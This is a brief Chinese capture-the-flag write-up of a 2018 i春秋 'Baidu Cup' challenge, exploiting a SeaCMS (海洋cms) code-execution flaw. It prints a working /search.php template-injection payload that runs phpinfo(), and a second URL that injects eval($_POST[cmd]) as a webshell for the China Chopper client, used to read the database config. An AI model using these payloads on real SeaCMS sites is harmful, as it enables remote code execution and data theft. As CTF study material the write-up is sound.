i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)
阿新 • • 發佈:2018-10-14
jpg com ctf比賽 ima 命令 () nbsp 上傳 菜刀
打開發現是海洋cms,那就搜索相關漏洞
找到一篇介紹海洋cms的命令執行漏洞的文章:https://www.jianshu.com/p/ebf156afda49
直接利用其中給出的poc
/search.php
searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
可以執行系統命令
沒找到flag,考慮可能在數據庫中,想上傳一句話,然後用菜刀查數據庫來著,但是沒有寫文件的權限,手動查數據庫感覺太麻煩,所以換個exp
海洋cms v6.28命令執行漏洞 : https://www.uedbox.com/seacms-v628-0day/
/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
菜刀直接連接
找了好久終於找到數據庫配置文件
編輯該條shell配置如下
最後得到flag
i春秋——“百度杯”CTF比賽 九月場——Test(海洋cms / seacms 任意代碼執行漏洞)